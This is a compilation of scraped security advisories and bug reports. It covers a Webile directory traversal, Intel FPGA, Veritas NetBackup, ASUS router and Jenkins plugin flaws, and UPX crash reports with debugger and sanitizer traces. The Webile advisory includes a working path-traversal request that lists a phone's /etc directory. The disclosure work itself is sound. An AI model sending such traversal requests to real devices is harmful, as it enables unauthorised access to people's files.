Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® FPGA SDK for OpenCL™ Advisory**

**Summary: **

A potential security vulnerability in the Intel® Field Programmable Gate Array (FPGA) Software Development Kit (SDK) for OpenCL™ may allow denial of service.  Intel is releasing Linux kernel driver updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-11165  

Description: Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

**Affected Products:**

Intel® FPGA SDK for OpenCL™ before version 19.4.

**Recommendations:**

Intel recommends updating Intel® FPGA SDK for OpenCL™ to version 19.3 and to download and install patch 0.24 on version 19.3:

http://download.altera.com/akdlm/software/acs/19.3/0.24cl/opencl-19.3-0.24cl-linux.run

Intel® FPGA SDK for OpenCL™ version 19.4 and future versions will contain the fix.

Intel® FPGA SDK for OpenCL™ is available for download at this location: http://fpgasoftware.intel.com/opencl/

**Acknowledgements:**

Intel would like to thank Nitin Pundir for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

12/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11165: INTEL-SA-00284

An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to a denial of service attack through the DiscoveryService service.

**Revision History**

*   1.0: End of September 2022 – Initial Public Release

**Summary**

Veritas has addressed vulnerabilities affecting NetBackup Primary and Media servers as well as Clients.

**Issues**

**Issue #1: Path Traversal**

The NetBackup Primary server is vulnerable to a Path traversal attack through the DiscoveryService service.

*   CVE ID: TBA
*   Severity: Medium
*   CVSS v3.1 Base Score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
*   Impacted Components: Primary Server, although fixes apply to Primary Server, Media Server and Clients. See recommended action below.
*   Affected Versions: 10.0.0.1 and earlier
*   Recommended action:
*   NetBackup Primary Servers, Media Servers, Clients: Upgrade to 8.3.0.2 or 9.0.0.1, or 9.1.0.1 or 10.0.0.1 and apply appropriate Hotfix.
*   NetBackup Appliance: Upgrade to any Maintenance Release (MR) of 3.3.0.2 or 4.0.0.1 or 4.1.0.1 or 5.0.0.1 MR1 and apply appropriate Hotfix. Client Hotfix not applicable.
*   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances. Client Hotfix not applicable.
*   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Issue #2: XML External Entity Injection**

*   The NetBackup Primary server is vulnerable to an XML External Entity (XXE) Injection attack through the DiscoveryService service.
*   CVE ID: TBA
*   Severity: Medium
*   CVSS v3.1 Base Score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
*   Impacted Components: Primary Server, although fixes apply to Primary Server, Media Server and Clients. See recommended action below.
*   Affected Versions: 10.0.0.1 and earlier
*   Recommended action:
    *   NetBackup Primary Servers, Media Servers, Clients: Upgrade to 8.3.0.2 or 9.0.0.1, or 9.1.0.1 or 10.0.0.1 and apply appropriate Hotfix.
    *   NetBackup Appliance: Upgrade to any Maintenance Release (MR) of 3.3.0.2 or 4.0.0.1 or 4.1.0.1 or 5.0.0.1 MR1 and apply appropriate Hotfix. Client Hotfix not applicable.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances. Client Hotfix not applicable.
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Issue #3: Denial of Service**

The NetBackup Primary server is vulnerable to a denial of service attack through the DiscoveryService service.

*   CVE ID: TBA
*   Severity: Medium
*   CVSS v3.1 Base Score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)
*   Impacted Components: Primary Server, although fixes apply to Primary Server, Media Server and Clients. See recommended action below.
*   Affected Versions: 10.0.0.1 and earlier
*   Recommended action:
    *   NetBackup Primary Servers, Media Servers, Clients: Upgrade to 8.3.0.2 or 9.0.0.1, or 9.1.0.1 or 10.0.0.1 and apply appropriate Hotfix.
    *   NetBackup Appliance: Upgrade to any Maintenance Release (MR) of 3.3.0.2 or 4.0.0.1 or 4.1.0.1 or 5.0.0.1 MR1 and apply appropriate Hotfix. Client Hotfix not applicable.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances. Client Hotfix not applicable.
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Notes  
**

This Security Advisory, VTS22-012, also addresses the issues identified in VTS22-008 which was released earlier. If you have not already applied VTS22-008 it is not necessary to apply VTS22-008 first, simply apply VTS22-012. If you have already applied VTS22-008 you can safely apply VTS22-012 on top of it.

**Questions **

For questions or problems regarding this advisory please contact Veritas Technical Support (https://www.veritas.com/support) 

**Acknowledgement **

Veritas would like to thank the following Airbus Security Team members for notifying us about these issues:     
Mouad Abouhali, Benoît Camredon, Nicholas Devillers, Anaïs Gantet, and Jean-Romain Garnier.  

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE. ANY FORWARD-LOOKING INDICATION OF PLANS FOR PRODUCTS IS PRELIMINARY AND ALL FUTURE RELEASE DATES ARE TENTATIVE AND ARE SUBJECT TO CHANGE. ANY FUTURE RELEASE OF THE PRODUCT OR PLANNED MODIFICATIONS TO PRODUCT CAPABILITY, FUNCTIONALITY, OR FEATURE ARE SUBJECT TO ONGOING EVALUATION BY VERITAS, AND MAY NOT BE IMPLEMENTED AND SHOULD NOT BE CONSIDERED FIRM COMMITMENTS BY VERITAS AND SHOULD NOT BE RELIED UPON IN MAKING DECISIONS.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-42299: Hotfix for Security Advisory Impacting NetBackup Servers and Clients

An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to an XML External Entity (XXE) Injection attack through the DiscoveryService service.

CVE-2022-42307: Hotfix for Security Advisory Impacting NetBackup Servers and Clients

An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to a Path traversal attack through the DiscoveryService service.

CVE-2022-42305: Hotfix for Security Advisory Impacting NetBackup Servers and Clients

An HTTP request smuggling in web application in ASUS ROG Rapture GT-AX11000, RT-AX3000, RT-AX55, RT-AX56U, RT-AX56U_V2, RT-AX58U, RT-AX82U, RT-AX82U GUNDAM EDITION, RT-AX86 Series(RT-AX86U/RT-AX86S), RT-AX86U ZAKU II EDITION, RT-AX88U, RT-AX92U, TUF Gaming AX3000, TUF Gaming AX5400 (TUF-AX5400), ASUS ZenWiFi XD6, ASUS ZenWiFi AX (XT8) before 3.0.0.4.386.45898, and RT-AX68U before 3.0.0.4.386.45911, allows a remote unauthenticated attacker to DoS via sending a specially crafted HTTP packet.

Skip to content Accessibility help

 ![ROG](https://www.asus.com/media/Odin/images/header/rog-gray.svg) ![ROG](https://www.asus.com/media/Odin/images/header/rog-gray_h.svg)

 ![ProArt](https://www.asus.com/media/Odin/images/header/proArt-gray.svg) ![ProArt](https://www.asus.com/media/Odin/images/header/proArt-gray_h.svg)

Gaming

Business

Mobile

Laptops

Displays / Desktops

Motherboards / Components

Networking / IoT / Servers

Accessories

Support

Skip to content Accessibility help

*   Overview
    
*   Tech Specs
    
*   Review
    
*   Support
    

Networking / IoT / Servers

WiFi Routers

ASUS WiFi Routers

RT-AX56U

Shop and Learn

Learn More

*   Asus Design Center
*   ASUSPRO
*   Automotive Solutions

Support

*   Check Repair Status
*   Find Service Locations
*   Product Registration
*   Email Us
*   Call Us
*   Security Advisory
*   ASUS Support Videos
*   MyASUS

About Us

*   About ASUS
*   News
*   Investor Relations
*   About CSR for global
*   Press Room
*   ASUSTOR Inc.
*   ASUS Cloud Corporation
*   UniMax Electronics Inc.

Community

*   ![Instagram](https://www.asus.com/media/odin/websites/global/SocialMedia/social-Instagram.svg)
*   ![YouTube](https://www.asus.com/media/odin/websites/global/SocialMedia/social-YouTube.svg)
*   ![Facebook](https://www.asus.com/media/odin/websites/global/SocialMedia/social-facebook.svg)

*   ![Twitter](https://www.asus.com/media/odin/websites/global/SocialMedia/social-Twitter.svg)
*   ![LinkedIn](https://www.asus.com/media/odin/websites/global/SocialMedia/social-LinkedIn.svg)
*   ![Pinterest](https://www.asus.com/media/odin/websites/global/SocialMedia/social-Pinterest.svg)

Global / English

Terms of Use Notice

Privacy Policy

©ASUSTeK Computer Inc. All rights reserved.

CVE-2021-41436: RT-AX56U｜WiFi Routers｜ASUS Global

An floating point exception was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.

Author: giantbranch of NSFOCUS Security Team

**What's the problem (or question)?**

Floating point exception was found in PackLinuxElf32::elf\_lookup of p\_lx\_elf.cpp (the latest commit of the devel branch)

through debugging，because of div 0

    ────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────
     ► 0x44d810    div    dword ptr [rbp - 0xe8]
        ↓
     ► 0x44d810    div    dword ptr [rbp - 0xe8]
    
    
    
    
    ────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────
       5395 {
       5396     if (hashtab && dynsym && dynstr) {
       5397         unsigned const nbucket = get_te32(&hashtab[0]);
       5398         unsigned const *const buckets = &hashtab[2];
       5399         unsigned const *const chains = &buckets[nbucket];
     ► 5400         unsigned const m = elf_hash(name) % nbucket;
       5401         if (!nbucket
       5402         ||  (unsigned)(file_size - ((char const *)buckets - (char const *)(void const *)file_image))
       5403                 <= sizeof(unsigned)*nbucket ) {
       5404             char msg[80]; snprintf(msg, sizeof(msg),
       5405                 "bad nbucket %#x\n", nbucket);
    ────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────
    00:0000│ rsp  0x7fffffffd2c0 —▸ 0x4e4017 ◂— pop    r15 /* 'JNI_OnLoad' */
    01:0008│      0x7fffffffd2c8 —▸ 0x817030 —▸ 0x53f580 ◂— add    byte ptr [rax], al
    02:0010│      0x7fffffffd2d0 —▸ 0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 ◂— ...
    03:0018│      0x7fffffffd2d8 ◂— 0x0
    04:0020│      0x7fffffffd2e0 —▸ 0x817884 ◂— 0x1200
    05:0028│      0x7fffffffd2e8 —▸ 0x804fd8 (N_BELE_RTP::le_policy) —▸ 0x5e5be8 —▸ 0x4b8d50 (N_BELE_RTP::LEPolicy::~LEPolicy()) ◂— push   rbp
    06:0030│      0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 —▸ 0x7fffffffd410 ◂— ...
    07:0038│      0x7fffffffd2f8 —▸ 0x4507b8 ◂— leave
    ──────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────
     ► f 0           44d810
       f 1           4377de PackLinuxElf32::PackLinuxElf32help1(InputFile*)+1632
       f 2           450a5b PackLinuxElf32Le::PackLinuxElf32Le(InputFile*)+79
       f 3           44b371 PackLinuxElf32x86::PackLinuxElf32x86(InputFile*)+35
       f 4           44b47b PackBSDElf32x86::PackBSDElf32x86(InputFile*)+35
       f 5           44b533 PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*)+35
       f 6           49a936
       f 7           49c2be PackMaster::getUnpacker(InputFile*)+40
       f 8           49c362 PackMaster::unpack(OutputFile*)+32
       f 9           4b9272
       f 10           4b9663
    Program received signal SIGFPE
    pwndbg> x /gx  $rbp - 0xe8
    0x7fffffffd2d8:	0x0000000000000000
    

ASAN reports:

    ==5426==ERROR: AddressSanitizer: FPE on unknown address 0x0000005d93dc (pc 0x0000005d93dc bp 0x7fffd6ee8580 sp 0x7fffd6ee8200 T0)
        #0 0x5d93dc in PackLinuxElf32::elf_lookup(char const*) const /src/upx-multi/src/p_lx_elf.cpp:5400:43
        #1 0x588c27 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:318:26
        #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9
        #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54
        #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50
        #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58
        #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9
        #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18
        #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9
        #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12
        #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13
        #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5
        #12 0x7f999579b83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /src/upx-multi/src/p_lx_elf.cpp:5400:43 in PackLinuxElf32::elf_lookup(char const*) const
    ==5426==ABORTING
    
    

**What should have happened?**

Check if the file is normal, exit if abnormal

**Do you have an idea for a solution?**

Add more checks

**How can we reproduce the issue?**

upx.out -d <poc\_filename>

poc:  
tests\_1119229d81ae333c2b95061a6d3ab57e09049c74\_.tar.gz

**Please tell us details about your environment.**

*   UPX version used (upx --version):

    upx 4.0.0-git-87b73e5cfdc1+
    UCL data compression library 1.03
    zlib data compression library 1.2.8
    LZMA SDK version 4.43
    Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer
    Copyright (C) 1996-2020 Laszlo Molnar
    Copyright (C) 2000-2020 John F. Reiser
    Copyright (C) 2002-2020 Jens Medoch
    Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler
    Copyright (C) 1999-2006 Igor Pavlov
    UPX comes with ABSOLUTELY NO WARRANTY; for details t
    

*   Host Operating System and version: Ubuntu 16.04.2 LTS
*   Host CPU architecture: x86\_64
*   Target Operating System and version: same as Host
*   Target CPU architecture: same as Host

CVE-2020-27802: Floating point exception in PackLinuxElf32::elf_lookup · Issue #393 · upx/upx

An invalid memory address reference was discovered in the adjABS function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.

Author: giantbranch of NSFOCUS Security Team

**What's the problem (or question)?**

Segmentation fault in PackLinuxElf64::adjABS of p\_lx\_elf.cpp in the latest commit of the devel branch

code:

    ────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────
     RAX  0x53be80 (abs_symbol_names) ◂— pop    rdi /* '__bss_end__' */
     RBX  0xe8cf
     RCX  0xff
     RDX  0x0
    *RDI  0x53be80 (abs_symbol_names) ◂— pop    rdi /* '__bss_end__' */
     RSI  0xff
     R8   0xa9d79
     R9   0x98c32
     R10  0x86f
     R11  0x246
     R12  0xff
     R13  0x7fffffffe440 ◂— 0x3
     R14  0x0
     R15  0x0
     RBP  0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ...
     RSP  0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1
    *RIP  0x442e5e ◂— call   0x401fd0
    ─────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────
       0x442e47    lea    rax, [rdx*8]
       0x442e4f    sub    rax, rdx
       0x442e52    add    rax, abs_symbol_names <0x53be80>
       0x442e58    mov    rsi, rcx
       0x442e5b    mov    rdi, rax
     ► 0x442e5e    call   strcmp@plt <0x401fd0>
            s1: 0x53be80 (abs_symbol_names) ◂— '__bss_end__'
            s2: 0xff
    
       0x442e63    test   eax, eax
       0x442e65    sete   al
       0x442e68    test   al, al
       0x442e6a    je     0x442e89
    
       0x442e6c    mov    eax, dword ptr [rbp - 0x24]
    ──────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────
       3132 int
       3133 PackLinuxElf64::adjABS(Elf64_Sym *sym, unsigned delta)
       3134 {
       3135     for (int j = 0; abs_symbol_names[j][0]; ++j) {
       3136         unsigned st_name = get_te32(&sym->st_name);
     ► 3137         if (!strcmp(abs_symbol_names[j], get_str_name(st_name, (unsigned)-1))) {
       3138             sym->st_value += delta;
       3139             return 1;
       3140         }
       3141     }
       3142     return 0;
    ──────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────
    00:0000│ rsp  0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1
    01:0008│      0x7fffffffd428 ◂— 0xfffff00000804fd8
    02:0010│      0x7fffffffd430 —▸ 0x7ffff7fb5068 ◂— 0xfff10000000000ff
    03:0018│      0x7fffffffd438 —▸ 0x817030 —▸ 0x53e1f8 —▸ 0x43af84 (PackLinuxElf64amd::~PackLinuxElf64amd()) ◂— push   rbp
    04:0020│      0x7fffffffd440 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1
    05:0028│      0x7fffffffd448 ◂— 0xff00000000
    06:0030│ rbp  0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ...
    07:0038│      0x7fffffffd458 —▸ 0x449fab (PackLinuxElf64::unpack(OutputFile*)+3259) ◂— add    qword ptr [rbp - 0x158], 0x18
    ────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────
     ► f 0           442e5e
       f 1           449fab PackLinuxElf64::unpack(OutputFile*)+3259
       f 2           492eb2 Packer::doUnpack(OutputFile*)+90
       f 3           49c5ab PackMaster::unpack(OutputFile*)+109
       f 4           4b946e
       f 5           4b985f
       f 6           42aade main+746
       f 7     7ffff727b840 __libc_start_main+240
    
    

get\_str\_name returned an unreadable value and causing crash in strcmp

In this poc, get\_str\_name return 0xff

ASAN reports:

    ==7880==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000ff (pc 0x000000430045 bp 0x7fff7a4d5050 sp 0x7fff7a4d47f0 T0)
    ==7880==The signal is caused by a READ memory access.
    ==7880==Hint: address points to the zero page.
        #0 0x430045 in strcmp (/out/upx-multi/upx-multi+0x430045)
        #1 0x5b6c98 in PackLinuxElf64::adjABS(N_Elf64::Sym<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> >*, unsigned int) /src/upx-multi/src/p_lx_elf.cpp:3137:14
        #2 0x5d06a9 in PackLinuxElf64::unpack(OutputFile*) /src/upx-multi/src/p_lx_elf.cpp:4611:25
        #3 0x6c82b0 in Packer::doUnpack(OutputFile*) /src/upx-multi/src/packer.cpp:107:5
        #4 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12
        #5 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13
        #6 0x555afd in main /src/upx-multi/src/main.cpp:1538:5
        #7 0x7fb3d16be83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #8 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/out/upx-multi/upx-multi+0x430045) in strcmp
    ==7880==ABORTING
    
    

**What should have happened?**

Check if the file is normal, exit if abnormal

**Do you have an idea for a solution?**

Add more checks

**How can we reproduce the issue?**

POC:  
tests\_7bc36b368db6594ef16f8abfd694fc11e4dc9acb\_.tar.gz

    $ ./src/upx.out -d ./tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2020
    UPX git-8d1d60  Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 24th 2020
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
    Segmentation fault
    

**Please tell us details about your environment.**

*   UPX version used (upx --version):

    upx 4.0.0-git-8d1d605b3d8c+
    UCL data compression library 1.03
    zlib data compression library 1.2.8
    LZMA SDK version 4.43
    Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer
    Copyright (C) 1996-2020 Laszlo Molnar
    Copyright (C) 2000-2020 John F. Reiser
    Copyright (C) 2002-2020 Jens Medoch
    Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler
    Copyright (C) 1999-2006 Igor Pavlov
    UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'.
    

*   Host Operating System and version: Ubuntu 16.04.2 LTS
*   Host CPU architecture: x86\_64
*   Target Operating System and version: same as Host
*   Target CPU architecture: same as Host

CVE-2020-27798: Segmentation fault in PackLinuxElf64::adjABS of p_lx_elf.cpp · Issue #396 · upx/upx

Jenkins Tag Profiler Plugin 0.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to reset profiler statistics.

Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Package**

maven org.jenkins-ci.plugins:tag-profiler (Maven)

**Affected versions**

<= 0.2

**Patched versions**

None

**Description**

Jenkins Tag Profiler Plugin 0.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to reset profiler statistics.

